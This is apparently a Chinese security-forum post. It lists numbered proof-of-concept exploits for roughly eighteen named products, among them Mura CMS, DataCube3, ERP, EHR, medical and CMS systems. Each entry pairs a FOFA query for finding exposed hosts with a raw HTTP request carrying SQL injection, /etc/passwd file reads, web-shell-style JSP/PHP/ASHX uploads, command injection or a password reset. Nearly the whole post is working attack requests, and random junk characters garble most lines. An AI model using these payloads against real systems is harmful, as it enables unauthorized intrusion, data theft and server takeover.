# m; a' x/ D) Y% I$ B# WCVE-2024-31750
: q2 g! Q2 `- Y7 u& B5 M( q: J: \F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统. j% |2 [* T, Y% ~
FOFA:title=="DataCube3"
2 ~( j! ]" I' g1 Y) j5 Y6 A# v2 k: ePOST /admin/pr_monitor/getting_index_data.php HTTP/1.1% _8 @" a6 @6 I: \! R; [: U4 l
Host: your-ip" F q1 t: @& N& a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
) T' c- d- q) E! v% y6 b! zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
m" y a& x7 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
B/ T5 f/ {6 h: s$ o2 FAccept-Encoding: gzip, deflate- R- @& L5 a* x& Q
Connection: close
2 S- A: D+ H, Q. ~Content-Type: application/x-www-form-urlencoded+ p; | e/ [4 N# } g
! F9 o! R* [# g
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
% ]/ W/ D$ e: o p+ s$ ?, H8 }6 L: B- m }( n/ A
" W1 @0 D. W" T! }187. Mura CMS processAsyncObject SQL注入
3 W5 V8 X) Y" G! o3 P% v9 JCVE-2024-32640
1 r6 C, x$ u9 p$ t" ^FOFA:"Mura CMS"
7 U) y5 R# U8 U7 l$ j: UPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
2 a) Q4 {8 H% E9 p" THost: your-ip
# J+ c- H3 M3 Q+ hContent-Type: application/x-www-form-urlencoded
- M; U3 t6 U% ]9 ]) Z# n+ G
* g2 T6 U# w$ J. K2 `! o* W; ^# [# m9 X
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1. N; n( e7 ?& t
4 i" U2 D+ b: a! X& }
J, ]; {/ u0 G3 m1 @% C188. 叁体-佳会视频会议 attachment 任意文件读取: O% [- H7 d& U& O5 @8 |6 L& `( M
version <= 3.9.7+ H# a( y' h, D! k | B/ S
FOFA:body="/system/get_rtc_user_defined_info?site_id"
* I3 @( F- g2 ?0 ]8 O1 yGET /attachment?file=/etc/passwd HTTP/1.1
, D4 \! `; l0 Z. ~4 F2 h7 D) F m% G3 ]Host: your-ip
* G/ T7 [/ _" A. t+ T" b9 q5 i9 I; EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- a% d( _$ G% E2 Y M8 B: ~% i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* A7 s! ^5 _2 Y! U% O7 A8 A2 ^Accept-Encoding: gzip, deflate. F' g! _: D' d, M
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8$ f) X O9 }" z( k6 f
Connection: close
2 x9 _- \) i7 e# a' d# X2 T+ ^0 C3 l
9 M4 ~4 j& [4 K6 k! G/ J8 n$ ~
6 j7 O+ B9 E' w. [4 M2 A. F189. 蓝网科技临床浏览系统 deleteStudy SQL注入" g |! E" b m9 r$ \# L: E% W
FOFA:app="LANWON-临床浏览系统"
8 M8 T- ]* n" O1 J. QGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 r& B o5 D0 P1 G: G/ B" K4 C
Host: your-ip; V8 {9 c7 X, \& C
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- n" [* a% x i' M O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, t2 P7 I$ c0 C2 ~* X( cAccept-Encoding: gzip, deflate& s; R% D$ R0 o! F9 V
Accept-Language: zh-CN,zh;q=0.9
8 ^ w } @2 fConnection: close# b4 D: Q# f9 M' s5 N
' ~% c: F* f9 x& I, X. |* ^( ~6 o6 i2 R6 ^& l* E7 ]
190. 短视频矩阵营销系统 poihuoqu 任意文件读取/ p1 K$ r( q# N( \$ D" c7 I
FOFA:title=="短视频矩阵营销系统"
$ U! l7 D. t8 r$ |0 KPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
6 A# G2 K+ V% q& X1 |% XHost: your-ip
% A/ U# F0 U/ J! iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36; V- j0 ~4 M& s/ h4 J: a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ [& s: h/ e: ?2 n, X* AContent-Type: application/x-www-form-urlencoded
" Z1 j: O1 p0 E- X# SAccept-Encoding: gzip, deflate
8 T& \, S+ E9 S3 i* N9 D- n1 Y; uAccept-Language: zh-CN,zh;q=0.9& P& R- A, ~' q* [
5 \, w) f* E. f7 b2 cpoi=file:///etc/passwd; G8 Q& N1 J& P, i J/ u
1 r e) y9 K4 ~( o: l# b( Q
! D! f# ]$ U8 v3 i [3 m191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入: N5 l$ a7 h7 A- M! Y
FOFA:body="/CDGServer3/index.jsp"
; P) J) E$ M# |) tPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
) P8 m# k( ]* E: j" @/ P6 D! ^Host: your-ip
' z, m0 d6 i' A G1 \+ ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ N' V& k- n9 |( x* H- sContent-Type: application/x-www-form-urlencoded0 F& V8 F# ^* Y6 C
2 ^) C, X* m- x/ p! J
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
8 M' f' X! ]& E. I3 i- B P) B* `
! N' ]/ i# c! i- P5 `& y
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传9 l4 \% V. Z, A& w
FOFA:title="用户登录_富通天下外贸ERP"
6 u- P) J+ D5 x9 JPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1! r% ?; R" s0 H3 H; Q
Host: your-ip) C w4 M/ Q$ C0 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 _# v/ e4 J& [* Q. i
Content-Type: application/x-www-form-urlencoded
" h$ `3 k3 ^- e+ G1 r) N1 ~0 h' u+ K3 {3 ?. V
6 V* C, ?$ v4 k- K4 W- J6 Z
<% @ webhandler language="C#" class="AverageHandler" %>5 q5 W X ~5 h9 I2 Y
using System;
2 @; U, A3 L+ x' }using System.Web;
7 i4 _ Y q2 H0 Z+ Z( O2 T* lpublic class AverageHandler : IHttpHandler3 R3 e7 X% e" l, S0 \0 U
{6 u- c2 h4 p% w& X
public bool IsReusable
* T- ^" h, h' F9 ^8 X{ get { return true; } }
1 ~* M3 s- [, m2 E4 k- W) G h; \public void ProcessRequest(HttpContext ctx)" k- C: u1 ]; |# ?( {' _8 d$ c2 Q- v$ S2 E
{3 e ^& s" k) \. j
ctx.Response.Write("test");3 g1 G, L6 X Z, W
}1 H# n6 Y! t1 b0 o& `) G
}2 L( F) j, }, n# n
+ ~! f9 w! L( \$ V; e6 F; ?1 b! Q- W) M
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
3 K5 o2 W2 }& H& h( tFOFA:body="山石云鉴主机安全管理系统"
6 W% o0 b+ S" F" t# oGET /master/ajaxActions/getTokenAction.php HTTP/1.1
7 O* ^' Q) n& P" [4 m, C6 zHost:
9 b' s9 r$ y- B/ @4 w- m( Y1 D- S- e5 j* QCookie: PHPSESSID=2333333333333;. w7 g% q1 L* T
Content-Type: application/x-www-form-urlencoded% Z& d7 D6 y; k: E
User-Agent: Mozilla/5.0" E# L( D) e" M5 l
# z0 m5 }$ d- y8 s
: A2 l$ y6 Q9 z' RPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
( Y" s$ C& d9 [Host:- r* s& A. f& K' e( S! [
User-Agent: Mozilla/5.0
0 e* o g, O) i8 c3 s0 ^+ BAccept-Encoding: gzip, deflate7 ~9 d5 I$ f1 [
Accept: */*
; v9 ~, J+ g X( e& v- b4 Y3 BConnection: close! s: k8 h, f3 s& F
Cookie: PHPSESSID=2333333333333;
4 Z+ z0 U5 S- zContent-Type: application/x-www-form-urlencoded
: |1 E) Y) q. V8 v8 g0 WContent-Length: 84
% P1 k1 N1 ?0 z; P* B& e; D; F: O0 B
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
# g. l# e! a" |6 o
" z5 r9 f6 j+ h9 U8 h. U5 K7 ^6 @' b; Q9 a# x; u
GET /master/img/config HTTP/1.1" N1 t7 S+ A0 X4 H1 d0 v
Host:
- p6 `" U" b! |6 U+ Q R yUser-Agent: Mozilla/5.0, u' H9 H- A" _( X( O7 O
% o/ E" [. ^4 D- k9 C
# ]; t) _$ t9 `) o" ~4 I194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
- A4 ?" Y8 u& |/ f1 EFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
2 U9 Z4 q, |. g; @; a& B7 Y* K( a, E: z
POST /servlet/uploadAttachmentServlet HTTP/1.1
& W5 l9 S% ], u# W6 ~Host: host2 h) c" j- q+ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36# w: M7 C$ v% R( c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 W0 v4 k" j, I6 ?5 ]* `9 X _; EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" v/ U3 t2 \4 ^7 r7 J1 RAccept-Encoding: gzip, deflate; M+ H7 |. p- D9 x# c2 B" i
Connection: close9 Y: ]- G' [! M" l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk0 {; l% e9 ~, L1 A1 x4 A
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
5 R" C4 v7 e3 f; ?" d7 b% n; N$ M B$ i: b+ o; i
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
: N5 u. x p9 G2 [, [/ n9 j2 TContent-Type: text/plain
7 n, b) h, ?5 Q# y; z# u2 ]6 s<% out.println("hello");%>; ]; a: @4 C' J: s& b
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- a2 C: E# Q. [3 T& V8 Q* EContent-Disposition: form-data; name="json"
8 u7 D! l# X: p! D2 y7 F {"iq":{"query":{"UpdateType":"mail"}}}+ D/ [$ T% E. `/ o* j) \
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
: T1 x4 t5 D0 D* P
5 m0 x. V" J* q) P8 j$ B0 i! T
' i7 f9 S/ T0 E+ R6 ^195. 飞鱼星上网行为管理系统 send_order.cgi命令执行3 B3 A# @" x7 U. Z
FOFA:title=="飞鱼星企业级智能上网行为管理系统
: Q& X$ }; n; {- B( W' Y" ePOST /send_order.cgi?parameter=operation HTTP/1.1
$ K; Y! O: @$ F' ^Host: 127.0.0.13 h/ a* S- C% D
Pragma: no-cache8 F( \5 {1 @6 o' V5 o: a) U
Cache-Control: no-cache
- R/ Y$ |$ R0 I) gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
* U1 X# O5 e/ [. {) KAccept: */*
0 j3 d! o5 A+ J. B2 IAccept-Encoding: gzip, deflate
( a; z+ ]! M) Y* l- N0 u+ x: [: k( sAccept-Language: zh-CN,zh;q=0.9
# @, z! M$ i( f) f8 rConnection: close* h% R. Z I* b" y+ @
Content-Type: application/x-www-form-urlencoded
5 v1 w7 F" o2 o8 AContent-Length: 685 d6 d, \2 R1 e
3 R- ]6 C7 u3 J/ l/ ?' D
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
' y" K; B Q) m" W2 X; I/ A' z
. @/ V& k& a# m0 E
! f5 Z* T8 g& _: @$ M196. 河南省风速科技统一认证平台密码重置
; ~! q& x2 B! aFOFA:body="/cas/themes/zbvc/js/jquery.min.js", J7 K5 T9 ~% m r8 e0 [: M9 c* v
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
5 Y, _5 m1 l. V) A$ ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ X2 m& O2 x( b2 ?0 P( d
Content-Type: application/json;charset=UTF-8
% x4 `& ~# y3 B& A) e4 AX-Requested-With: XMLHttpRequest
& B& e( H! b4 u5 |/ m$ n6 i% nHost:
4 I8 Y' p& @: z ], u7 qAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
* ]- k( b! Z7 DContent-Length: 45! ~; L+ K% f- k/ F
Connection: close
, K" ~( ^9 ^. [! @8 a' L# @6 a2 m: t( a- j6 D
{"xgh":"test","newPass":"test666","email":""}7 _' A x6 K$ k4 c8 o; l
: N; R; d" L" X5 p+ j. [8 H+ ?
$ s3 K' D& h' B1 g# }4 @
1 |+ H( n5 G7 ^7 e# S; c- c2 P197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入* K: |+ g: U( g, g0 N) g
FOFA:app="浙大恩特客户资源管理系统"
4 p) b4 O U* mGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
% }/ n5 a) }" FHost:' D, ~6 a" Q/ u6 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
( z' i" X0 e: b$ d8 j. n/ pAccept-Encoding: gzip, deflate
, E7 }! ?) t0 G. O" K+ W) SConnection: close
: P- G$ B1 O) R" E: {4 _6 `6 F, W" r, ^
4 E4 T% o+ p4 ]! \4 }7 ?. w; j- w* s/ i! I
198. 阿里云盘 WebDAV 命令注入3 g& l* H' q) ?
CVE-2024-29640; V# w |+ V" P' P
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.12 j4 ~+ m7 Z4 f0 }# U9 z
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64 w4 z4 i) i0 l t8 u# n* o
Accept: */*8 x, Y* y+ _" {& C4 w& q6 @7 S. Z3 c! a
Accept-Encoding: gzip, deflate
6 M& C# d) l/ S2 gAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6) K5 [- [$ ?1 `. X e
Connection: close1 I& k$ W: d0 j# ~& u
- |' E) _- Q& |: _# t3 x7 X ~
% d& `# s% x7 {2 I' M* h
199. cockpit系统assetsmanager_upload接口 文件上传. b+ V5 A1 ^/ ^$ c. `9 M$ ~+ B8 \% K
! s7 O/ R. W* F. C% E t1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:. [% j8 p% ~( }
GET /auth/login?to=/ HTTP/1.1
7 R1 q1 H7 D$ U; B) i
: _% a3 [2 \" M, |) j. z响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
0 W( i, }1 y6 y0 ?! R9 Y+ Z) b7 U4 j. t3 b9 k
2.使用刚才上一步获取到的jwt获取cookie:8 \3 }5 ^: U ^8 k9 V$ i
! A" Z$ b: \5 i0 k
POST /auth/check HTTP/1.1# o" j- z8 A5 y/ z5 X3 J
Content-Type: application/json8 u: Z. j% [' t( G3 u
' x8 p3 {" O! q; C+ a9 V
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
+ U/ l m8 K% X3 K/ O, D
3 u$ j9 z; c% f响应:200,返回值:6 A$ @* s' [; G, ]
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
4 m5 _( Z" u& TFofa:title="Authenticate Please!"6 T4 r. `, o8 r9 u7 o: A+ @+ r
POST /assetsmanager/upload HTTP/1.1$ L5 Y+ e" q" e* d# k0 W" l0 H9 }
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb32 n: c6 f6 F* T& V8 H+ c
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92- ~, X; Z" ?# h
; I I6 x7 d& [0 [
-----------------------------36D28FBc36bd6feE7Fb3* W: p) u g& z; z8 u
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
6 K3 g0 {: i; z I3 CContent-Type: text/php
9 S% R2 y5 d' w; S. d3 P y \: E0 [- T. o4 a7 [
<?php echo "tttt";unlink(__FILE__);?>; M4 `, S; M0 b! F
-----------------------------36D28FBc36bd6feE7Fb3
' |8 I# V5 T5 n) p6 yContent-Disposition: form-data; name="folder"5 r1 m, y% s# w6 O& v1 K; y
" M, A3 S# T% a; f; q% ]-----------------------------36D28FBc36bd6feE7Fb3--
* P* |: R* N3 V8 m0 h
+ \8 ], q7 P/ h) g4 j: r% j' h
K5 g1 b" g+ q+ x, n/storage/uploads/tttt.php- L" C7 t! q3 [9 ~: H6 Z7 m
# |7 v0 \& t1 o2 U. O% F8 j
200. SeaCMS海洋影视管理系统dmku SQL注入( Y/ G9 b; I: w
FOFA:app="海洋CMS"
5 v* D7 l3 g9 a- ^GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1/ _/ \: y5 f0 A" k/ g4 K
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s7 a$ f- f6 N. E! Y: Z$ O: T N
Upgrade-Insecure-Requests: 15 M5 G" f* U }; [# @
Cache-Control: max-age=0
) ^' }8 \% X6 K9 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 {" f* t |% `. s' F" qAccept-Encoding: gzip, deflate1 O( n( V8 ~3 X, H! G* T$ @
Accept-Language: zh-CN,zh;q=0.94 Y8 b+ \% @3 ^, G% f5 ]. M
3 G0 K+ k) K+ M8 z: M0 u( v( b
. D3 p5 v) s( T t201. 方正全媒体新闻采编系统 binary SQL注入8 k5 {" d5 O! ^
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统", A2 x8 r9 N0 j3 M( T# Q
POST /newsedit/newsplan/task/binary.do HTTP/1.1
8 G; L2 M* { |5 U+ b k+ Q! GContent-Type: application/x-www-form-urlencoded
9 O3 s( B2 s# X/ R2 G5 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; R7 B0 s2 p ?$ a$ x4 v$ f
Accept-Encoding: gzip, deflate
6 a* | {; t2 e$ ?% }; ?Accept-Language: zh-CN,zh;q=0.9$ } [0 J+ X% z6 ?8 u+ _. _& k
Connection: close
: J( J. f4 P" j0 Z0 x$ y& X) V' @. m; v8 h9 C' f+ A
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1! d6 m. _8 j8 w! ^
# Y0 R9 A2 ?5 a/ [2 ^& d
- E; I+ y: w$ h* m# {202. 微擎系统 AccountEdit任意文件上传8 ]" y9 \$ e6 k7 F
FOFA:body="/Widgets/WidgetCollection/" Y- q3 |1 P" i& A% M9 a
获取__VIEWSTATE和__EVENTVALIDATION值
$ y+ Q2 m( f9 v) tGET /User/AccountEdit.aspx HTTP/1.1+ ]3 v8 _) l |
Host: 滑板人之家. m3 B3 X3 _' ? F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
7 d8 E; u4 n m% y' T) L4 GContent-Length: 0
# F8 h3 {- C1 G4 k$ W+ y( P" y' t8 N- j; L6 O+ W- }
8 O2 \0 ~5 ^- ?* V- k) K
替换__VIEWSTATE和__EVENTVALIDATION值( m7 `7 v& Z8 Y+ v% c2 y& R$ Z
POST /User/AccountEdit.aspx HTTP/1.1. F0 {5 A! H2 ]1 ?
Accept-Encoding: gzip, deflate, br
, r6 \6 z k1 W7 C" D, e2 Y! JContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
h2 J4 y! z3 f! | d4 q( P( s: Z8 G% O! ]0 f7 Y
-----------------------------786435874t385875938657365873465673587356870 h. I- f) s, Z% B* V6 E5 s- L: i' _
Content-Disposition: form-data; name="__VIEWSTATE"3 Y2 m( Y% C; j! R5 E# z8 P' \
3 E& O0 [9 f$ ^4 ?) M
__VIEWSTATE) N5 p* ^& a i
-----------------------------786435874t385875938657365873465673587356877 C! }: c# |6 Y
Content-Disposition: form-data; name="__EVENTVALIDATION"1 f; n' a3 h; z% g; x9 a% Y3 J# P
: V- v" c/ L6 J) T__EVENTVALIDATION& H% H) ]' k8 U& }
-----------------------------786435874t38587593865736587346567358735687
3 x P+ j1 C' }# ZContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt": A1 r5 u2 M( ?
Content-Type: text/plain
?% f4 a* S3 H' w; b& z" I7 V1 \# Z' f/ a
Hello World!
. h- |# o, _' |# g7 n/ |0 R( @-----------------------------786435874t385875938657365873465673587356876 Q. Q6 X5 e' J7 ]5 V9 K1 `
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"8 q* @ }8 e$ `% n6 |, R" Y
0 |8 r' a. P8 q# {5 I0 f
上传图片
# T2 E* H5 A6 t! S5 \5 W% w" `( d/ z+ Y-----------------------------786435874t38587593865736587346567358735687
' P) _( ]* a5 z: p7 C$ W5 X- M+ _Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
" W3 j- d" K8 y, `
; r- F) K. c% A# v: G7 j( @4 R
9 G* o# O# {4 p. N-----------------------------786435874t38587593865736587346567358735687
( A, _1 [' v* C- a- p. S& V* RContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"3 d2 @: ?2 t9 u/ F% j0 C
: y& [$ x- v8 K
5 i! Q9 p( r1 ~7 R1 u# N) ~# v* u
-----------------------------786435874t38587593865736587346567358735687--
7 N) T) N7 O' s8 a7 Z' H7 N/ e7 X [( K; W, `
- @9 S* \7 \" s/ J o* L
/_data/Uploads/1123.txt
# s& G% ?# f. p8 T+ n( i3 W# M) k/ o. ~' T8 t" ~9 s+ T7 N5 A, u- p6 x) `( R4 b
203. 红海云EHR PtFjk 文件上传) \2 I! U% o0 [- M- G) B
FOFA:body="RedseaPlatform"* M! @0 X6 |- ]2 r2 U7 p/ L
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1& A/ D# R2 w3 g. w. p$ b
Host: x.x.x.x! E+ d v1 ]& F: }/ g7 P
Accept-Encoding: gzip
* g" M* r; r" A1 f% B( XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" D% o. [. d- x" |) F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4$ t; \$ |9 X6 r- R. ?
Content-Length: 210
" J+ D$ W; f j( x& J, r; l# L/ d% r1 v/ Y: p
------WebKitFormBoundaryt7WbDl1tXogoZys4
2 T' `) R- I- q, E* n3 YContent-Disposition: form-data; name="fj_file"; filename="11.jsp", |7 u$ k3 a* A' J
Content-Type:image/jpeg3 m: U/ ~. Z3 [% v$ v
5 Y2 i X8 E* n- C$ M: A( d<% out.print("hello,eHR");%>1 j0 ?- @. Z& P9 H! c" F. X# K
------WebKitFormBoundaryt7WbDl1tXogoZys4-- E; K2 s) D; F- ]6 a3 n
. V9 D+ ~( l, g- e' G6 z6 A9 G
^- C- F# C$ U1 q+ @% Z3 g6 o: @
6 ?, h& l" W! p1 c& M( \) ~6 s6 k; z7 v
6 N: S6 N9 t( k8 g! z* @# m/ y
1 E) t& i: i! Z
|
发表于 2024-6-5 14:31:29